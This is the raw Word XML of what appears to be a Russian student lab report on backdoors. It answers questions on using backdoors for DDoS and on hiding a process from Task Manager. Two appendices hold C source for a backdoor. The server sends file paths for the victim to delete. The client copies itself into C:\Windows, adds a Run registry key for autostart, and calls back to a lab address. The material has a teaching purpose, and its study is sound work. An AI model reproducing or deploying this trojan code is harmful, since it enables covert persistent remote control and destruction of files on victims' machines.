      <w:r w:rsidRPr="002D5B1E">
        <w:t>нужно   регулярно   осуществлять проверку открытых портов</w:t>
      </w:r>
      <w:r w:rsidR="001F7336">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="002D5B1E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4082E63D" w14:textId="4652DF1C" w:rsidR="002D5B1E" w:rsidRPr="002D5B1E" w:rsidRDefault="002D5B1E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  <w:r w:rsidRPr="002D5B1E">
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidR="001F7336">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D5B1E">
        <w:t xml:space="preserve">Можно   ли   использовать   потайные   ходы   для   организации распределенной атаки типа “отказ в обслуживании”? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2AB716" w14:textId="62A09A78" w:rsidR="006A5F64" w:rsidRPr="002D5B1E" w:rsidRDefault="002D5B1E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  <w:r w:rsidRPr="002D5B1E">
        <w:t>Да, потайные ходы можно использовать для организации распределенной</w:t>
      </w:r>
      <w:r w:rsidR="001F7336">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D5B1E">
        <w:t>атаки   отказа   в   обслуживании</w:t>
      </w:r>
      <w:r w:rsidR="001F7336">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D2EA5D" w14:textId="74461620" w:rsidR="002D5B1E" w:rsidRDefault="002D5B1E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  <w:r w:rsidRPr="002D5B1E">
        <w:t>4.</w:t>
      </w:r>
      <w:r w:rsidR="001F7336">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Каким образом можно удалить процесс программы-клиента из списка диспетчера задач? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C12ABF3" w14:textId="36A3DAE4" w:rsidR="002D5B1E" w:rsidRPr="001F7336" w:rsidRDefault="001F7336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  <w:r>
        <w:t xml:space="preserve">Осуществить </w:t>
      </w:r>
      <w:r w:rsidR="002D5B1E" w:rsidRPr="002D5B1E">
        <w:t>поиск окна Диспетчера Задач</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="002D5B1E" w:rsidRPr="002D5B1E">
        <w:t>поиск в нем дочернего окна</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002D5B1E" w:rsidRPr="002D5B1E">
        <w:t>(списка), содержащего имена всех процессов</w:t>
      </w:r>
      <w:r>
        <w:t>, осуществить</w:t>
      </w:r>
      <w:r w:rsidR="002D5B1E" w:rsidRPr="002D5B1E">
        <w:t xml:space="preserve"> удаление из списка нашего процесса.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Так программа станет ещё более скрытной.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DE36E3" w14:textId="7BC7F87A" w:rsidR="001F7336" w:rsidRDefault="001F7336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  <w:r>
        <w:t>5.</w:t>
      </w:r>
      <w:r w:rsidRPr="001F7336">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>О</w:t>
      </w:r>
      <w:r w:rsidRPr="001F7336">
        <w:t xml:space="preserve">пишите схему работы </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F7336">
        <w:t>потайного хода</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F7336">
        <w:t xml:space="preserve"> использующего для удаленного управления telnet-сервер</w:t>
      </w:r>
      <w:r>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE02113" w14:textId="49FD29D4" w:rsidR="001F7336" w:rsidRDefault="001F7336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  <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Telnet</w:t>
      </w:r>
      <w:r w:rsidRPr="001F7336">
        <w:t xml:space="preserve"> позволяет пользователю установить TCP-соединение с сервером и затем передавать коды нажатия клавиш так, как если бы работа проводилась на консоли сервера. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Telnet</w:t>
      </w:r>
      <w:r w:rsidRPr="001F7336">
        <w:t xml:space="preserve"> служит для выполнения удаленного доступа к вычислительным ресурсам и базам данных Для входа в базу данных или ЭВМ обычно нужна аутентификация (ввод имени-идентификатора пользователя и его слова-пропуска). В некоторых реализациях допускается использование параметров, которые подключают необходимые эмуляторы терминалов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21FEF5AE" w14:textId="318EB3A2" w:rsidR="001F7336" w:rsidRDefault="001F7336" w:rsidP="001F7336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</w:p>
    <w:p w14:paraId="4A8E23B8" w14:textId="103A77A5" w:rsidR="001F7336" w:rsidRDefault="001F7336" w:rsidP="001F7336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</w:p>
    <w:p w14:paraId="2E0CAF50" w14:textId="77777777" w:rsidR="001F7336" w:rsidRDefault="001F7336" w:rsidP="001F7336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567"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="286F426A" w14:textId="25289C3F" w:rsidR="006162CC" w:rsidRPr="004E1B96" w:rsidRDefault="00000000" w:rsidP="00187B79">
      <w:pPr>
        <w:pStyle w:val="20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2D5B1E">
        <w:lastRenderedPageBreak/>
        <w:t>ПРИЛОЖЕНИЕ</w:t>
      </w:r>
      <w:r w:rsidRPr="004E1B96">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0485F5" w14:textId="0734E0A1" w:rsidR="006162CC" w:rsidRPr="004E1B96" w:rsidRDefault="001A38A1" w:rsidP="00187B79">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A38A1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:u w:val="single"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Приложение</w:t>
      </w:r>
      <w:r w:rsidRPr="004E1B96">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001A38A1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:u w:val="single"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Сервер</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129A26A1" w14:textId="77777777" w:rsidR="001A38A1" w:rsidRPr="004E1B96" w:rsidRDefault="001A38A1" w:rsidP="00187B79">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2848E108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_CRT_SECURE_NO_WARNINGS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EEDBB8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_WINSOCK_DEPRECATED_NO_WARNINGS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513F4EA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B85F9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&lt;stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3038DDC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&lt;string.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A20487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&lt;winsock2.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3294569B" w14:textId="77777777" w:rsidR="001A38A1" w:rsidRPr="004E1B96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4E1B96">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>#</w:t>
      </w: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include</w:t>
      </w:r>
      <w:r w:rsidRPr="004E1B96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4E1B96">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>&lt;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windows</w:t>
      </w:r>
      <w:r w:rsidRPr="004E1B96">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>.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h</w:t>
      </w:r>
      <w:r w:rsidRPr="004E1B96">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCB4E8C" w14:textId="77777777" w:rsidR="001A38A1" w:rsidRPr="004E1B96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59153AF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//указание компилятору, чтоб пользовался этой библиотекой</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2344401C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#pragma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comment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lib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"Ws2_32.lib"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C5C3C5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841BCA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PORT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3250</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2AFF14" w14:textId="77777777" w:rsidR="001A38A1" w:rsidRPr="0050170E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50170E">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>#</w:t>
      </w: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define</w:t>
      </w:r>
      <w:r w:rsidRPr="0050170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LENGTH</w:t>
      </w:r>
      <w:r w:rsidRPr="0050170E">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> 256 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сколько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букв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имени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уд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файла</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48889548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main(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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD3BE1A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830C834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//запуск интерфейса сокетов - то как будут вз-дейст наши приложения</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327D6E26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//с какой версией сокетов мы работаем</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F779E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WSADATA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Ws;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010D55F0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A68DAF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erStat =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WSAStartup(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MAKEWORD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(2, 2), &amp;Ws);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9666F0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//Создать: в случае успеха 0, иначе код ошибки</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F7EE03" w14:textId="77777777" w:rsidR="001A38A1" w:rsidRPr="00E53682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E53682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erStat</w:t>
      </w:r>
      <w:r w:rsidRPr="00E53682">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> !</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E53682">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>= 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3972C75A" w14:textId="77777777" w:rsidR="001A38A1" w:rsidRPr="0050170E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3682">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00E53682">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19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50170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14:paraId="03568E82" w14:textId="77777777" w:rsidR="001A38A1" w:rsidRPr="0050170E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170E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2AA5B74B" w14:textId="77777777" w:rsidR="001A38A1" w:rsidRPr="0050170E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2757637" w14:textId="77777777" w:rsidR="001A38A1" w:rsidRPr="0050170E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170E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50170E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gramStart"/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>printf</w:t>
      </w:r>
      <w:r w:rsidRPr="0050170E">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0050170E">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"%</w:t>
      </w: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>d</w:t>
      </w:r>
      <w:r w:rsidRPr="0050170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", </w:t>
      </w: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>Ws</w:t>
      </w:r>
      <w:r w:rsidRPr="0050170E">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w: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>wVersion</w:t>
      </w:r>
      <w:r w:rsidRPr="0050170E">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F44D7C6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50170E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/*можем увидеть 514. работаем со 2 версией */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F169ED1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51D7BA9A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//создаём сокет</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1E7764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//семейство адресов IPv4, тип транспортного протокола TCP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D7222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SOCKET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ServSock =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socket(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AF_INET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SOCK_STREAM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, 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3346F2F0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E2ABD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//INVLID_SOCKET - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>по</w:t>
      </w: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сути</w:t>
      </w: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-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E64777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(ServSock ==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INVALID_SOCKET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250989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14:paraId="28F9C194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closesocket(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ServSock);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10840882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WSACleanup(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447307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14:paraId="2A1B9C9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00528E98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3512DD" w14:textId="77777777" w:rsidR="001A38A1" w:rsidRPr="0050170E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50170E">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19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Привязка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сокета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паре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>IP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 xml:space="preserve"> - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>адрес</w:t>
      </w:r>
      <w:r w:rsidRPr="0050170E">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Порт</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6121AA96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50170E"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/*IP адрес - нашего компа - для транспортного протокола*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639A1FEC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/*Порт - для приложений, чтоб найти приложение-получателя*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC77C00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</w:p>
    <w:p w14:paraId="41ECC89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sockaddr_in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servInfo;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D92D37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ZeroMemory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&amp;servInfo,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(servInfo));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA86C5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</w:p>
    <w:p w14:paraId="315081B9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servInfo.sin_family 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AF_INET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88D5A50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servInfo.sin_port =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htons(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PORT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1CEB389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>//сокет будет связан со всеми локальными интерфейсами</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CA6E0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servInfo.sin_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addr.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s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_addr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INADDR_ANY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EAF108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92DA37D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erStat =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bind(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ServSock, (</w:t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sockaddr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*)&amp;servInfo,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(servInfo));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E5B540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erStat !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= 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35670CA0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closesocket(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ServSock);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5C2EB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WSACleanup(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780A99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14:paraId="6C3B88AA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42F6CFFA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958B28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lastRenderedPageBreak/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Слушает</w:t>
      </w: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8000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>ждёт</w:t>
      </w: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клиента</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31082F2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erStat =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listen(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ServSock,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SOMAXCONN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2050EA2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erStat !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= 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370F2A2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closesocket(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ServSock);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD1EB92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WSACleanup(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F47171C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14:paraId="054E433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2674AD95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33ED7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sockaddr_in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ClientInfo;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142AD5BD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ClientInfo_size = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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ClientInfo);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A567AC4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ZeroMemory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&amp;ClientInfo, ClientInfo_size);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B09980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BFDBDB4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SOCKET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ClientConn =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accept(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ServSock, (</w:t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sockaddr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*)&amp;ClientInfo, &amp;ClientInfo_size);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5063AC7C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DCE1E6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(ClientConn ==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INVALID_SOCKET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26D2E7A8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closesocket(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ServSock);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040DED3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closesocket(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ClientConn);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255291B4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WSACleanup(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BAC72BD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14:paraId="51BAC062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04735608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57B82FFF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</w:p>
    <w:p w14:paraId="5016213A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printf(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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"Successfully connected.\n"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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0594D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printf(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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"Adress: [%s]\n"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, inet_ntoa(ClientInfo.sin_addr));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2D10F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EFD6FA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puts(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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"Enter the path to file you want to remove:"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016FE2D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GoDelete[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LENGTH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4D21D785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(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2655D49F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14:paraId="45CAA04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memset(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GoDelete,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LENGTH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974307F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gets_s(GoDelete);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4975240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send(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ClientConn, GoDelete, (strlen(GoDelete) + 1) *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), 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF4A4C5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memset(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GoDelete,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LENGTH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D61ED30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recv(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ClientConn, GoDelete,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LENGTH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0) !=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SOCKET_ERROR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strcmp(GoDelete,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"End"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 != 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D51930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puts(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GoDelete);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A341C9C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strcmp(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GoDelete,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"End"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 == 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3A3BCD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1150AFA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5F52FB0D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0D760096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012C5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closesocket(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ClientConn);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0E179C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closesocket(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ServSock);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AACA300" w14:textId="77777777" w:rsidR="001A38A1" w:rsidRPr="004E1B96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4E1B96">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WSACleanup(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004E1B9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F613FD" w14:textId="77777777" w:rsidR="001A38A1" w:rsidRPr="004E1B96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699458" w14:textId="77777777" w:rsidR="001A38A1" w:rsidRPr="004E1B96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E1B96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system(</w:t>
      </w:r>
      <w:r w:rsidRPr="004E1B96">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"pause"</w:t>
      </w:r>
      <w:r w:rsidRPr="004E1B9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F6CE017" w14:textId="77777777" w:rsidR="001A38A1" w:rsidRPr="004E1B96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DDB064" w14:textId="77777777" w:rsidR="001A38A1" w:rsidRPr="004E1B96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E1B96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4E1B9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4E1B9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14:paraId="34343E2B" w14:textId="3EC8B36C" w:rsidR="001A38A1" w:rsidRPr="004E1B96" w:rsidRDefault="001A38A1" w:rsidP="00187B79">
      <w:pPr>
        <w:ind w:firstLine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E1B96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4981445" w14:textId="060EEF54" w:rsidR="001A38A1" w:rsidRPr="004E1B96" w:rsidRDefault="001A38A1" w:rsidP="00187B79">
      <w:pPr>
        <w:ind w:firstLine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9C763F8" w14:textId="7DC6B2B2" w:rsidR="001A38A1" w:rsidRPr="001A38A1" w:rsidRDefault="001A38A1" w:rsidP="00187B79">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A38A1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:u w:val="single"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Приложение</w:t>
      </w:r>
      <w:r w:rsidRPr="001A38A1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:u w:val="single"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Клиент</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC1FF19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_CRT_SECURE_NO_WARNINGS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2664488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_WINSOCK_DEPRECATED_NO_WARNINGS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703E88AD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A0E52C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&lt;stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028B695A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&lt;string.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3955643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&lt;winsock2.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF310A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&lt;windows.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D32372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&lt;winreg.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D03B682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7DA139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#pragma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comment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lib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"Ws2_32.lib"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89ED54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0681EBF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PORT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3250</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357029E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lastRenderedPageBreak/>
        <w:t>#define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LENGTH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120</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0361D3" w14:textId="2F4C2B8F" w:rsidR="001A38A1" w:rsidRPr="00187B79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>//192.168.</w:t>
      </w:r>
      <w:r w:rsidR="00187B79" w:rsidRPr="0050170E">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>56.102</w:t>
      </w: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айпи</w:t>
      </w:r>
      <w:r w:rsidR="00187B79" w:rsidRPr="0050170E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="00187B79">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCCAFA6" w14:textId="4AFA85D9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IPV4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"192.168.</w:t>
      </w:r>
      <w:r w:rsidR="00187B79">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>56.1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367B3E89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WIN_PATH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L"C:\\Windows\\Client.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311ACF55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REG_PATH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L"Software\\Microsoft\\Windows\\CurrentVersion\\Run"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C90C73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808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>#define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REG_NAME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L"Client"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09388DC9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A42006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ProcedureCopy(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){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086D756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TCHAR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* FilePath;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3CACA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14:paraId="34B784A4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FilePath = (</w:t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TCHAR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*)calloc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MAX_PATH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TCHAR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7F684D7C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((Result = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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GetModuleFileName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FilePath,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MAX_PATH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== 0)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F7179F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((Result = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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CopyFile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FilePath,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WIN_PATH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TRUE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== 0)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6001F9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13864C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7E1BE7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ProcedureAutorun(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){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200133F4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HKEY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Key;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6932D29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LONG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Result;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC682A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((Result = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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RegOpenKey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HKEY_CURRENT_USER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REG_PATH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&amp;Key)) !=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ERROR_SUCCESS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8E8A7F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</w:p>
    <w:p w14:paraId="2E63F777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((Result = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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RegSetValueEx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Key,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REG_NAME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0,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REG_SZ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</w:p>
    <w:p w14:paraId="4C195517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(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unsigned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*)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WIN_PATH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gramStart"/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WIN_PATH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+ 1)) !=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ERROR_SUCCESS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2E22A6D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</w:p>
    <w:p w14:paraId="39824D9F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RegCloseKey(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Key);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E8A52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615AD14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9DAA29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5395D530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207AAA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маскировка</w:t>
      </w:r>
    </w:p>
